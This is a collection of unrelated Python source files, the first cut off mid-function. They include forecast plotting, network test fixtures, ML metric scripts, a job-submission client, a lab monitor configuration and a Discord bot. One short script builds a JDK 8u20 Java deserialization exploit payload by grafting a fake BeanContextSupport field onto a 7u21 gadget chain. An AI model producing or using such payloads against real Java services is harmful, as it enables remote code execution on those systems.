name="Truth",
mode="lines",
line={"color": style["color_axis"], "dash": "dot", "width": 1.5},
)
)
else:
fig = px.line(
eval_df,
x="ds",
y=["truth", "forecast"],
color_discrete_sequence=style["colors"][1:],
hover_data={"variable": True, "value": ":.4f", "ds": False},
)
fig.update_xaxes(
rangeslider_visible=True,
rangeselector=dict(
buttons=list(
[
dict(count=7, label="1w", step="day", stepmode="backward"),
dict(count=1, label="1m", step="month", stepmode="backward"),
dict(count=3, label="3m", step="month", stepmode="backward"),
dict(count=6, label="6m", step="month", stepmode="backward"),
dict(count=1, label="YTD", step="year", stepmode="todate"),
dict(count=1, label="1y", step="year", stepmode="backward"),
dict(step="all"),
]
)
),
)
fig.update_layout(
yaxis_title=target_col,
legend_title_text="",
height=500,
width=800,
title_text="Forecast vs Truth",
title_x=0.5,
title_y=1,
hovermode="x unified",
)
return fig
def plot_truth_vs_actual_scatter(
eval_df: pd.DataFrame, use_cv: bool, style: Dict[Any, Any]
) -> go.Figure:
"""Creates a plotly scatter plot showing forecasts and actual values on evaluation period.
Parameters
----------
eval_df : pd.DataFrame
Evaluation dataframe.
use_cv : bool
Whether or not cross-validation is used.
style : Dict
Style specifications for the graph (colors).
Returns
-------
go.Figure
Plotly scatter plot showing forecasts and actual values on evaluation period.
"""
eval_df["date"] = eval_df["ds"].map(lambda x: x.strftime("%A %b %d %Y"))
if use_cv:
colors = reverse_list(style["colors"], eval_df["Fold"].nunique())
fig = px.scatter(
eval_df,
x="truth",
y="forecast",
color="Fold",
opacity=0.5,
color_discrete_sequence=colors,
hover_data={"date": True, "truth": ":.4f", "forecast": ":.4f"},
)
else:
fig = px.scatter(
eval_df,
x="truth",
y="forecast",
opacity=0.5,
color_discrete_sequence=style["colors"][2:],
hover_data={"date": True, "truth": ":.4f", "forecast": ":.4f"},
)
fig.add_trace(
go.Scatter(
x=eval_df["truth"],
y=eval_df["truth"],
name="optimal",
mode="lines",
line=dict(color=style["color_axis"], width=1.5),
)
)
fig.update_layout(
xaxis_title="Truth", yaxis_title="Forecast", legend_title_text="", height=450, width=800
)
return fig
def plot_residuals_distrib(eval_df: pd.DataFrame, use_cv: bool, style: Dict[Any, Any]) -> go.Figure:
"""Creates a plotly distribution plot showing distribution of residuals on evaluation period.
Parameters
----------
eval_df : pd.DataFrame
Evaluation dataframe.
use_cv : bool
Whether or not cross-validation is used.
style : Dict
Style specifications for the graph (colors).
Returns
-------
go.Figure
Plotly distribution plot showing distribution of residuals on evaluation period.
"""
eval_df["residuals"] = eval_df["forecast"] - eval_df["truth"]
if len(eval_df) >= 10:
x_min, x_max = eval_df["residuals"].quantile(0.005), eval_df["residuals"].quantile(0.995)
else:
x_min, x_max = eval_df["residuals"].min(), eval_df["residuals"].max()
if use_cv:
labels = sorted(eval_df["Fold"].unique(), reverse=True)
residuals = [eval_df.loc[eval_df["Fold"] == fold, "residuals"] for fold in labels]
residuals = [x[x.between(x_min, x_max)] for x in residuals]
else:
labels = [""]
residuals_series = pd.Series(eval_df["residuals"])
residuals = [residuals_series[residuals_series.between(x_min, x_max)]]
colors = (
reverse_list(style["colors"], eval_df["Fold"].nunique()) if use_cv else [style["colors"][2]]
)
fig = ff.create_distplot(residuals, labels, show_hist=False, colors=colors)
fig.update_layout(
title_text="Distribution of errors",
title_x=0.5,
title_y=0.85,
xaxis_title="Error (Forecast - Truth)",
showlegend=True if use_cv else False,
xaxis_zeroline=True,
xaxis_zerolinecolor=style["color_axis"],
xaxis_zerolinewidth=1,
yaxis_zeroline=True,
yaxis_zerolinecolor=style["color_axis"],
yaxis_zerolinewidth=1,
yaxis_rangemode="tozero",
height=500,
width=800,
)
return fig
def plot_detailed_metrics(
metrics_df: pd.DataFrame,
perf: Dict[Any, Any],
eval: Dict[Any, Any],
use_cv: bool,
style: Dict[Any, Any],
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Displays a dataframe or plots graphs showing model performance on selected metrics.
Parameters
----------
metrics_df : pd.DataFrame
Dataframe containing model performance on different metrics at the desired granularity.
perf : Dict
Dictionary containing model performance on different metrics at the desired granularity.
eval : Dict
Evaluation specifications (evaluation set, selected metrics, granularity).
use_cv : bool
Whether or not cross-validation is used.
style : Dict
Style specifications for the graph (colors).
report: List[Dict[str, Any]]
List of all report components.
"""
metrics = [metric for metric in perf.keys() if perf[metric][eval["granularity"]].nunique() > 1]
if len(metrics) > 0:
fig = make_subplots(
rows=len(metrics) // 2 + len(metrics) % 2, cols=2, subplot_titles=metrics
)
for i, metric in enumerate(metrics):
colors = (
style["colors"]
if use_cv
else [style["colors"][i % len(style["colors"])]]
* perf[metric][eval["granularity"]].nunique()
)
fig_metric = go.Bar(
x=perf[metric][eval["granularity"]], y=perf[metric][metric], marker_color=colors
)
fig.append_trace(fig_metric, row=i // 2 + 1, col=i % 2 + 1)
fig.update_layout(
height=300 * (len(metrics) // 2 + len(metrics) % 2),
width=1000,
showlegend=False,
)
st.plotly_chart(fig)
report.append({"object": fig, "name": "eval_detailed_performance", "type": "plot"})
else:
st.dataframe(metrics_df)
return report
def make_separate_components_plot(
model: Prophet,
forecast_df: pd.DataFrame,
target_col: str,
cleaning: Dict[Any, Any],
resampling: Dict[Any, Any],
style: Dict[Any, Any],
) -> go.Figure:
"""Creates plotly area charts with the components of the prediction, each one on its own subplot.
Parameters
----------
model : Prophet
Fitted model.
forecast_df : pd.DataFrame
Predictions of Prophet model.
target_col : str
Name of target column.
cleaning : Dict
Cleaning specifications.
resampling : Dict
Resampling specifications (granularity, dataset frequency).
style : Dict
Style specifications for the graph (colors).
Returns
-------
go.Figure
Plotly area charts with the components of the prediction, each one on its own subplot.
"""
components = get_forecast_components(model, forecast_df)
features = components.columns
n_features = len(components.columns)
fig = make_subplots(rows=n_features, cols=1, subplot_titles=features)
for i, col in enumerate(features):
if col == "daily":
hours = forecast_df["ds"].groupby(forecast_df.ds.dt.hour).last()
values = forecast_df.loc[forecast_df.ds.isin(hours), ("ds", col)]
values = values.iloc[values.ds.dt.hour.values.argsort()] # sort by hour order
y = values[col]
x = values.ds.map(lambda h: h.strftime("%H:%M"))
elif col == "weekly":
days = forecast_df["ds"].groupby(forecast_df.ds.dt.dayofweek).last()
values = forecast_df.loc[forecast_df.ds.isin(days), ("ds", col)]
values = values.iloc[
values.ds.dt.dayofweek.values.argsort()
] # sort by day of week order
y = values[col]
x = values.ds.dt.day_name()
elif col == "monthly":
days = forecast_df["ds"].groupby(forecast_df.ds.dt.day).last()
values = forecast_df.loc[forecast_df.ds.isin(days), ("ds", col)]
values = values.iloc[values.ds.dt.day.values.argsort()] # sort by day of month order
y = values[col]
x = values.ds.dt.day
elif col == "yearly":
year = forecast_df["ds"].max().year - 1
days = pd.date_range(start=f"{year}-01-01", end=f"{year}-12-31")
y = forecast_df.loc[forecast_df["ds"].isin(days), col]
x = days.dayofyear
else:
x = components.index
y = components[col]
fig.append_trace(
go.Scatter(
x=x,
y=y,
fill="tozeroy",
name=col,
mode="lines",
line=dict(color=style["colors"][i % len(style["colors"])]),
),
row=i + 1,
col=1,
)
y_label = f"log {target_col}" if cleaning["log_transform"] else target_col
fig.update_yaxes(title_text=f"{y_label} / {resampling['freq']}", row=i + 1, col=1)
fig.update_xaxes(showgrid=False)
if col == "yearly":
fig["layout"][f"xaxis{i + 1}"].update(
tickmode="array",
tickvals=[1, 61, 122, 183, 244, 305],
ticktext=["Jan", "Mar", "May", "Jul", "Sep", "Nov"],
)
fig.update_layout(height=200 * n_features if n_features > 1 else 300, width=800)
return fig
def make_waterfall_components_plot(
model: Prophet,
forecast_df: pd.DataFrame,
start_date: datetime.date,
end_date: datetime.date,
target_col: str,
cleaning: Dict[Any, Any],
resampling: Dict[Any, Any],
style: Dict[Any, Any],
df: pd.DataFrame,
) -> go.Figure:
"""Creates a waterfall chart with the components of the prediction.
Parameters
----------
model : Prophet
Fitted model.
forecast_df : pd.DataFrame
Predictions of Prophet model.
start_date : datetime.date
Start date for components computation.
end_date : datetime.date
End date for components computation.
target_col : str
Name of target column.
cleaning : Dict
Cleaning specifications.
resampling : Dict
Resampling specifications (granularity, dataset frequency).
style : Dict
Style specifications for the graph (colors).
df: pd.DataFrame
Dataframe containing the ground truth.
Returns
-------
go.Figure
Waterfall chart with the components of prediction.
"""
N_digits = style["waterfall_digits"]
components = get_forecast_components(model, forecast_df, True).reset_index()
waterfall = prepare_waterfall(components, start_date, end_date)
truth = df.loc[
(df["ds"] >= pd.to_datetime(start_date)) & (df["ds"] < pd.to_datetime(end_date)), "y"
].mean(axis=0)
fig = go.Figure(
go.Waterfall(
orientation="v",
measure=["relative"] * (len(waterfall) - 1) + ["total"],
x=[x.capitalize() for x in list(waterfall.index)[:-1] + ["Forecast (Truth)"]],
y=list(waterfall.values),
textposition="auto",
text=[
"+" + str(round(x, N_digits)) if x > 0 else "" + str(round(x, N_digits))
for x in list(waterfall.values)[:-1]
]
+ [f"{round(waterfall.values[-1], N_digits)} ({round(truth, N_digits)})"],
decreasing={"marker": {"color": style["colors"][1]}},
increasing={"marker": {"color": style["colors"][0]}},
totals={"marker": {"color": style["colors"][2]}},
)
)
y_label = f"log {target_col}" if cleaning["log_transform"] else target_col
fig.update_yaxes(title_text=f"{y_label} / {resampling['freq']}")
fig.update_layout(
title=f"Forecast decomposition "
f"(from {start_date.strftime('%Y-%m-%d')} to {end_date.strftime('%Y-%m-%d')})",
title_x=0.2,
width=800,
)
return fig
def display_global_metrics(
evaluation_df: pd.DataFrame,
eval: Dict[Any, Any],
dates: Dict[Any, Any],
resampling: Dict[Any, Any],
use_cv: bool,
config: Dict[Any, Any],
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Displays all global metrics.
Parameters
----------
evaluation_df : pd.DataFrame
Evaluation dataframe.
eval : Dict
Evaluation specifications.
dates : Dict
Dictionary containing all dates information.
resampling : Dict
Resampling specifications.
use_cv : bool
Whether or note cross-validation is used.
config : Dict
Lib configuration dictionary.
report: List[Dict[str, Any]]
List of all report components.
"""
eval_all = {
"granularity": "cutoff" if use_cv else "Global",
"metrics": ["RMSE", "MAPE", "MAE", "MSE", "SMAPE"],
"get_perf_on_agg_forecast": eval["get_perf_on_agg_forecast"],
}
metrics_df, _ = get_perf_metrics(evaluation_df, eval_all, dates, resampling, use_cv, config)
if use_cv:
st.dataframe(metrics_df)
else:
col1, col2, col3, col4, col5 = st.columns(5)
col1.markdown(
f"<p style='color: {config['style']['colors'][1]}; "
f"font-weight: bold; font-size: 20px;'> {eval_all['metrics'][0]}</p>",
unsafe_allow_html=True,
)
col1.write(metrics_df.loc["Global", eval_all["metrics"][0]])
col2.markdown(
f"<p style='color: {config['style']['colors'][1]}; "
f"font-weight: bold; font-size: 20px;'> {eval_all['metrics'][1]}</p>",
unsafe_allow_html=True,
)
col2.write(metrics_df.loc["Global", eval_all["metrics"][1]])
col3.markdown(
f"<p style='color: {config['style']['colors'][1]}; "
f"font-weight: bold; font-size: 20px;'> {eval_all['metrics'][2]}</p>",
unsafe_allow_html=True,
)
col3.write(metrics_df.loc["Global", eval_all["metrics"][2]])
col4.markdown(
f"<p style='color: {config['style']['colors'][1]}; "
f"font-weight: bold; font-size: 20px;'> {eval_all['metrics'][3]}</p>",
unsafe_allow_html=True,
)
col4.write(metrics_df.loc["Global", eval_all["metrics"][3]])
col5.markdown(
f"<p style='color: {config['style']['colors'][1]}; "
f"font-weight: bold; font-size: 20px;'> {eval_all['metrics'][4]}</p>",
unsafe_allow_html=True,
)
col5.write(metrics_df.loc["Global", eval_all["metrics"][4]])
report.append(
{
"object": metrics_df.loc["Global"].reset_index(),
"name": "eval_global_performance",
"type": "dataset",
}
)
return report
|
30303
|
import logging
import time
import pytest
from tests.common.utilities import wait_until
from utils import get_crm_resources, check_queue_status, sleep_to_wait
CRM_POLLING_INTERVAL = 1
CRM_DEFAULT_POLL_INTERVAL = 300
MAX_WAIT_TIME = 120
logger = logging.getLogger(__name__)
@pytest.fixture(scope='module')
def get_function_completeness_level(pytestconfig):
return pytestconfig.getoption("--completeness_level")
@pytest.fixture(scope="module", autouse=True)
def set_polling_interval(duthost):
wait_time = 2
duthost.command("crm config polling interval {}".format(CRM_POLLING_INTERVAL))
logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
yield
duthost.command("crm config polling interval {}".format(CRM_DEFAULT_POLL_INTERVAL))
logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
@pytest.fixture(scope='module')
def withdraw_and_announce_existing_routes(duthost, localhost, tbinfo):
ptf_ip = tbinfo["ptf_ip"]
topo_name = tbinfo["topo"]["name"]
logger.info("withdraw existing ipv4 and ipv6 routes")
localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action="withdraw", path="../ansible/")
wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, "inq") == True)
sleep_to_wait(CRM_POLLING_INTERVAL * 100)
ipv4_route_used_before = get_crm_resources(duthost, "ipv4_route", "used")
ipv6_route_used_before = get_crm_resources(duthost, "ipv6_route", "used")
logger.info("ipv4 route used {}".format(ipv4_route_used_before))
logger.info("ipv6 route used {}".format(ipv6_route_used_before))
yield ipv4_route_used_before, ipv6_route_used_before
logger.info("announce existing ipv4 and ipv6 routes")
localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action="announce", path="../ansible/")
wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, "outq") == True)
sleep_to_wait(CRM_POLLING_INTERVAL * 5)
logger.info("ipv4 route used {}".format(get_crm_resources(duthost, "ipv4_route", "used")))
logger.info("ipv6 route used {}".format(get_crm_resources(duthost, "ipv6_route", "used")))
|
30322
|
import argparse
import logging
from pathlib import Path
import dask
import h5py
import joblib
import numpy as np
import pandas as pd
from dask.diagnostics import ProgressBar
from tqdm import tqdm
from dsconcept.get_metrics import (
get_cat_inds,
get_synth_preds,
load_category_models,
load_concept_models,
HierarchicalClassifier,
get_mets,
)
logging.basicConfig(level=logging.INFO)
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.INFO)
def main(
experiment_name,
synth_strat,
in_cat_preds,
out_store,
synth_batch_size,
t,
out_synth_scores,
limit=None,
con_limit=None,
):
test_inds = np.load(f"data/interim/{experiment_name}/test_inds.npy")
feature_matrix = joblib.load(f"data/interim/{experiment_name}/feature_matrix.jbl")
in_cat_models = Path(f"models/{experiment_name}/categories/models/")
in_kwd_models = Path(f"models/{experiment_name}/keywords/models/")
cat_preds = np.load(in_cat_preds) # based on experiment or explicit path?
cat_clfs = load_category_models(in_cat_models)
cd = load_concept_models(in_kwd_models)
clf = HierarchicalClassifier(cat_clfs, cd)
if limit is not None:
LOG.info(f"Limiting to {limit} test records.")
feature_matrix_test = feature_matrix.tocsc()[test_inds[0:limit], :]
cat_preds = cat_preds[0:limit, :]
# TODO: How does this affect indices?
else:
feature_matrix_test = feature_matrix.tocsc()[test_inds, :]
LOG.info(f'Synthesizing predictions with strategy "{synth_strat}".')
all_cat_inds = get_cat_inds(clf.categories, cat_preds, t=t)
if con_limit is not None:
conwc = clf.concepts_with_classifiers[0:con_limit]
else:
conwc = clf.concepts_with_classifiers
shape = (feature_matrix_test.shape[0], len(conwc))
with tqdm(total=shape[0]) as pbar:
get_synth_preds(
out_store,
shape,
all_cat_inds,
clf.categories,
synth_batch_size,
only_cat=False,
synth_strat=synth_strat,
con_limit=con_limit,
limit=limit,
pbar=pbar,
)
LOG.info("Obtaining metrics.")
with h5py.File(out_store, "r") as f0:
if limit is not None:
target_values = f0["ground_truth"][0:limit, :]
else:
target_values = f0["ground_truth"].value
with h5py.File(out_store, "r") as f0:
synth_preds = f0["synthesis"].value
jobs = []
mets_pbar = tqdm(
range(len(conwc)),
total=len(conwc),
)
for i in mets_pbar:
job = dask.delayed(get_mets)(
i, synth_preds, target_values, conwc, mets_pbar
)
jobs.append(job)
records = dask.compute(jobs)
new_recs_df = pd.DataFrame(records[0])
LOG.info(f"Saving results to {out_synth_scores}.")
new_recs_df.to_csv(out_synth_scores)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Say hello")
parser.add_argument("--experiment_name", help="input txt file")
parser.add_argument("--synth_strat", help="input txt file")
parser.add_argument("--in_cat_preds", help="input txt file")
parser.add_argument("--store", help="input txt file")
parser.add_argument("--synth_batch_size", help="input txt file", type=int)
parser.add_argument("--threshold", help="input txt file", type=float)
parser.add_argument("--out_synth_scores", help="input txt file")
parser.add_argument(
"--limit", help="size for sample to test synthesis", type=int, default=None
)
parser.add_argument(
"--con_limit", help="size for concept sample", type=int, default=None
)
args = parser.parse_args()
main(
args.experiment_name,
args.synth_strat,
args.in_cat_preds,
args.store,
args.synth_batch_size,
args.threshold,
args.out_synth_scores,
args.limit,
args.con_limit,
)
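# Example invocation (illustrative; the script name and all paths/values below
# are hypothetical):
#   python synthesize_predictions.py --experiment_name exp1 --synth_strat mean \
#       --in_cat_preds data/interim/exp1/cat_preds.npy \
#       --store data/interim/exp1/synth_store.h5 \
#       --synth_batch_size 1000 --threshold 0.5 \
#       --out_synth_scores reports/exp1/synth_scores.csv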
|
30356
|
import yaml
from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock
from javaSerializationTools import ObjectRead
from javaSerializationTools import ObjectWrite
if __name__ == '__main__':
with open("../files/7u21.ser", "rb") as f:
a = ObjectRead(f)
obj = a.readContent()
    # Step 1: add a fake field named "fake" to the HashSet
signature = JavaString("Ljava/beans/beancontext/BeanContextSupport;")
fakeSignature = {'name': 'fake', 'signature': signature}
obj.javaClass.superJavaClass.fields.append(fakeSignature)
    # Build the fake BeanContextSupport object for deserialization; note that it
    # must reference the AnnotationInvocationHandler attached later.
    # Read the class description of BeanContextSupportClass
with open('BeanContextSupportClass.yaml', 'r') as f1:
BeanContextSupportClassDesc = yaml.load(f1.read(), Loader=yaml.FullLoader)
    # Add the beanContextChildPeer field to beanContextSupportObject
beanContextSupportObject = JavaObject(BeanContextSupportClassDesc)
beanContextChildPeerField = JavaField('beanContextChildPeer',
JavaString('Ljava/beans/beancontext/BeanContextChild'),
beanContextSupportObject)
beanContextSupportObject.fields.append([beanContextChildPeerField])
    # Add the serializable field to beanContextSupportObject
serializableField = JavaField('serializable', 'I', 1)
beanContextSupportObject.fields.append([serializableField])
    # Add objectAnnotation data to beanContextSupportObject
beanContextSupportObject.objectAnnotation.append(JavaEndBlock())
AnnotationInvocationHandler = obj.objectAnnotation[2].fields[0][0].value
beanContextSupportObject.objectAnnotation.append(AnnotationInvocationHandler)
    # Put the beanContextSupportObject into the fake field
fakeField = JavaField('fake', fakeSignature['signature'], beanContextSupportObject)
obj.fields[0].append(fakeField)
with open("8u20.ser", 'wb') as f:
o = ObjectWrite(f)
o.writeContent(obj)
|
30425
|
from base import job_desc_pb2
from base import task_desc_pb2
from base import reference_desc_pb2
from google.protobuf import text_format
import httplib, urllib, re, sys, random
import binascii
import time
import shlex
def add_worker_task(job_name, task, binary, args, worker_id, num_workers, extra_args):
task.uid = 0
task.name = "%s/%d" % (job_name, worker_id)
task.state = task_desc_pb2.TaskDescriptor.CREATED
task.binary = "/usr/bin/python"
task.args.extend(args)
task.args.append(str(worker_id))
task.args.append(str(num_workers))
task.args.append(binary)
task.args.extend(extra_args)
task.inject_task_lib = True
if len(sys.argv) < 4:
print "usage: memcached_submit.py <coordinator hostname> <web UI port> " \
"<task binary> [<args>] [<num workers>] [<job name>]"
sys.exit(1)
hostname = sys.argv[1]
port = int(sys.argv[2])
memcached_exe = sys.argv[3]
if len(sys.argv) > 4:
extra_args = shlex.split(sys.argv[4])
else:
extra_args = []
if len(sys.argv) > 5:
num_workers = int(sys.argv[5])
else:
num_workers = 1
if len(sys.argv) > 6:
job_name = sys.argv[6]
else:
job_name = "memcached_job_at_%d" % (int(time.time()))
basic_args = []
basic_args.append("/home/srguser/firmament-experiments/helpers/napper/napper_memcached.py")
basic_args.append("caelum-301:2181")
basic_args.append(job_name)
job_desc = job_desc_pb2.JobDescriptor()
job_desc.uuid = "" # UUID will be set automatically on submission
job_desc.name = job_name
# set up root task
job_desc.root_task.uid = 0
job_desc.root_task.name = job_name + "/0"
job_desc.root_task.state = task_desc_pb2.TaskDescriptor.CREATED
job_desc.root_task.binary = "/usr/bin/python"
job_desc.root_task.args.extend(basic_args)
job_desc.root_task.args.append("0") # root task is worker ID 0
job_desc.root_task.args.append(str(num_workers))
job_desc.root_task.args.append(memcached_exe)
job_desc.root_task.args.extend(extra_args)
job_desc.root_task.inject_task_lib = True
# add workers
for i in range(1, num_workers):
task = job_desc.root_task.spawned.add()
add_worker_task(job_name, task, memcached_exe, basic_args, i, num_workers, extra_args)
input_id = binascii.unhexlify('feedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeef')
output_id = binascii.unhexlify('db33daba280d8e68eea6e490723b02cedb33daba280d8e68eea6e490723b02ce')
output2_id = binascii.unhexlify('feedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeef')
job_desc.output_ids.append(output_id)
job_desc.output_ids.append(output2_id)
input_desc = job_desc.root_task.dependencies.add()
input_desc.id = input_id
input_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
input_desc.type = reference_desc_pb2.ReferenceDescriptor.CONCRETE
input_desc.non_deterministic = False
input_desc.location = "blob:/tmp/fib_in"
final_output_desc = job_desc.root_task.outputs.add()
final_output_desc.id = output_id
final_output_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
final_output_desc.type = reference_desc_pb2.ReferenceDescriptor.FUTURE
final_output_desc.non_deterministic = True
final_output_desc.location = "blob:/tmp/out1"
final_output2_desc = job_desc.root_task.outputs.add()
final_output2_desc.id = output2_id
final_output2_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
final_output2_desc.type = reference_desc_pb2.ReferenceDescriptor.FUTURE
final_output2_desc.non_deterministic = True
final_output2_desc.location = "blob:/tmp/out2"
#params = urllib.urlencode({'test': text_format.MessageToString(job_desc)})
params = 'jd=%s' % text_format.MessageToString(job_desc)
print "SUBMITTING job with parameters:"
print params
print ""
try:
headers = {"Content-type": "application/x-www-form-urlencoded"}
conn = httplib.HTTPConnection("%s:%s" % (hostname, port))
conn.request("POST", "/job/submit/", params, headers)
response = conn.getresponse()
except Exception as e:
print "ERROR connecting to coordinator: %s" % (e)
sys.exit(1)
data = response.read()
match = re.search(r"([0-9a-f\-]+)", data, re.MULTILINE | re.S | re.I | re.U)
print "----------------------------------------------"
if match and response.status == 200:
job_id = match.group(1)
print "JOB SUBMITTED successfully!\nJOB ID is %s\nStatus page: " \
"http://%s:%d/job/status/?id=%s" % (job_id, hostname, port, job_id)
else:
print "ERROR submitting job -- response was: %s (Code %d)" % (response.reason,
response.status)
print "----------------------------------------------"
conn.close()
|
30448
|
from tastypie.api import Api
from encuestas.api.user import UserResource
from encuestas.api.encuesta import EncuestaResource
from encuestas.api.grupo import GrupoResource
from encuestas.api.pregunta import PreguntaResource
from encuestas.api.opcion import OpcionResource
from encuestas.api.link import LinkResource
from encuestas.api.respuesta import RespuestaResource
v1_api = Api(api_name='v1')
v1_api.register(UserResource())
v1_api.register(EncuestaResource())
v1_api.register(GrupoResource())
v1_api.register(PreguntaResource())
v1_api.register(OpcionResource())
v1_api.register(LinkResource())
v1_api.register(RespuestaResource())
|
30469
|
description = 'setup for the status monitor'
group = 'special'
_expcolumn = Column(
Block('Experiment', [
BlockRow(
# Field(name='Proposal', key='exp/proposal', width=7),
# Field(name='Title', key='exp/title', width=20,
# istext=True, maxlen=20),
Field(name='Current status', key='exp/action', width=40,
istext=True, maxlen=40),
Field(name='Data file', key='exp/lastpoint'),
),
],
),
)
_sampletable = Column(
Block('Sample table', [
BlockRow(
Field(dev='omgs'),
),
BlockRow(
Field(dev='tths'),
),
],
),
)
_instrument = Column(
Block('Instrument', [
BlockRow(
Field(dev='wav'),
),
BlockRow(
Field(dev='slits'),
),
BlockRow(
Field(dev='mon'),
Field(name='Resosteps', key='adet/resosteps'),
Field(name='Step', key='adet/value[0]'),
),
],
),
)
_frm = Column(
Block('FRM II', [
BlockRow(
Field(dev='ReactorPower'),
),
],
),
Block('SPODI', [
BlockRow(
Field(name='O2', dev='o2_nguide'),
Field(name='O2 part', dev='o2part_nguide'),
),
BlockRow(
Field(name='p1 N-Guide', dev='p1_nguide'),
Field(name='p2 N-Guide', dev='p2_nguide'),
Field(name='p3 N-Guide', dev='p3_nguide'),
),
],
),
)
# generic CCR-stuff
ccrs = []
ccrsupps = []
ccrplots = []
_ccrnrs = [6,] + list(range(10, 22 + 1))
for i in _ccrnrs:
ccrs.append(
Block('CCR%d-Pulse tube' % i, [
BlockRow(
Field(dev='t_ccr%d_c' % i, name='Coldhead'),
Field(dev='t_ccr%d_d' % i, name='Regulation'),
Field(dev='t_ccr%d_b' % i, name='Sample'),
),
BlockRow(
Field(key='t_ccr%d/setpoint' % i, name='Setpoint'),
Field(key='t_ccr%d/p' % i, name='P', width=7),
Field(key='t_ccr%d/i' % i, name='I', width=7),
Field(key='t_ccr%d/d' % i, name='D', width=6),
),
],
setups='ccr%d and not cci3he0*' % i,
),
)
ccrsupps.append(
Block('CCR%d' % i, [
BlockRow(
Field(dev='T_ccr%d_A' % i, name='A'),
Field(dev='T_ccr%d_B' % i, name='B'),
Field(dev='T_ccr%d_C' % i, name='C'),
Field(dev='T_ccr%d_D' % i, name='D'),
),
BlockRow(
Field(key='t_ccr%d/setpoint' % i, name='SetP.', width=6),
Field(key='t_ccr%d/p' % i, name='P', width=4),
Field(key='t_ccr%d/i' % i, name='I', width=4),
Field(key='t_ccr%d/d' % i, name='D', width=3),
),
BlockRow(
Field(dev='ccr%d_p1' % i, name='P1'),
Field(dev='ccr%d_p2' % i, name='P2'),
),
],
setups='ccr%d' % i,
),
)
_cryo = Column(*ccrs)
_cryosup = Column(*ccrsupps)
_htf = Column(
Block('HTF', [
BlockRow(
Field(dev='T'),
Field(name='Power', key='T/heaterpower'),
),
],
setups='htf*',
),
)
_magnet = Column(
Block('Magnet', [
BlockRow(
Field(dev='B'),
),
],
setups='ccm*',
),
)
_sc = Column(
Block('Sample Changer', [
BlockRow(
Field(dev='sams'),
),
],
setups='samplechanger',
),
)
_e = Column(
Block('E field', [
BlockRow(
Field(dev='E'),
),
],
setups='efield',
),
)
_tension = Column(
Block('Tension rack', [
BlockRow(
Field(dev='teload'),
Field(dev='tepos'),
Field(dev='teext'),
Field(dev='topos'),
Field(dev='tomom'),
),
],
setups='tensile',
),
)
_nps = [1, 2, 3, 10, 11, 12]
_npblocks = []
for i in _nps:
_npblocks.append(
Block('Newport', [
BlockRow(
Field(dev='sth_rsc%02d' % i),
),
],
setups='rsc%02d' % i,
),
)
_rsc = Column(*_npblocks)
devices = dict(
Monitor = device('nicos.services.monitor.html.Monitor',
title = 'SPODI status monitor',
loglevel = 'info',
interval = 10,
filename = '/spodicontrol/webroot/index.html',
cache = 'spodictrl.spodi.frm2',
font = 'Luxi Sans',
valuefont = 'Consolas',
prefix = 'nicos/',
padding = 0,
fontsize = 24,
layout = [
Row(_expcolumn),
Row(_frm, _instrument, _sampletable),
Row(_htf,),
Row(_cryosup),
Row(_tension),
Row(_magnet, _e,),
Row(_sc, _rsc),
],
noexpired = True,
),
)
|
30476
|
import base64
import datetime
import io
import json
import traceback
import aiohttp
import discord
import pytimeparse
from data.services.guild_service import guild_service
from discord.commands import Option, slash_command, message_command, user_command
from discord.ext import commands
from discord.utils import format_dt
from PIL import Image
from utils.autocompleters import (bypass_autocomplete, get_ios_cfw,
rule_autocomplete)
from utils.config import cfg
from utils.context import BlooContext
from utils.logger import logger
from utils.menu import BypassMenu
from utils.permissions.checks import (PermissionsFailure, mod_and_up,
whisper, whisper_in_general)
from utils.permissions.permissions import permissions
from utils.permissions.slash_perms import slash_perms
from yarl import URL
class PFPView(discord.ui.View):
def __init__(self, ctx: BlooContext):
super().__init__(timeout=30)
self.ctx = ctx
async def on_timeout(self):
for child in self.children:
child.disabled = True
await self.ctx.respond_or_edit(view=self)
class PFPButton(discord.ui.Button):
def __init__(self, ctx: BlooContext, member: discord.Member):
super().__init__(label="Show other avatar", style=discord.ButtonStyle.primary)
self.ctx = ctx
self.member = member
self.other = False
async def callback(self, interaction: discord.Interaction):
if interaction.user != self.ctx.author:
return
if not self.other:
avatar = self.member.guild_avatar
self.other = not self.other
else:
avatar = self.member.avatar or self.member.default_avatar
self.other = not self.other
embed = interaction.message.embeds[0]
embed.set_image(url=avatar.replace(size=4096))
animated = ["gif", "png", "jpeg", "webp"]
not_animated = ["png", "jpeg", "webp"]
def fmt(format_):
return f"[{format_}]({avatar.replace(format=format_, size=4096)})"
if avatar.is_animated():
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in animated])}"
else:
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in not_animated])}"
await interaction.response.edit_message(embed=embed)
class BypassDropdown(discord.ui.Select):
def __init__(self, ctx, apps):
self.ctx = ctx
self.apps = {app.get("bundleId"): app for app in apps}
options = [
discord.SelectOption(label=app.get("name"), value=app.get("bundleId"), description="Bypasses found" if app.get("bypasses") else "No bypasses found", emoji='<:appstore:392027597648822281>') for app in apps
]
super().__init__(placeholder='Pick an app...',
min_values=1, max_values=1, options=options)
async def callback(self, interaction):
if interaction.user != self.ctx.author:
return
self.view.stop()
app = self.apps.get(self.values[0])
self.ctx.app = app
if not app.get("bypasses"):
await self.ctx.send_error("No bypasses found for this app!")
return
menu = BypassMenu(self.ctx, app.get("bypasses"), per_page=1,
page_formatter=format_bypass_page, whisper=self.ctx.whisper)
await menu.start()
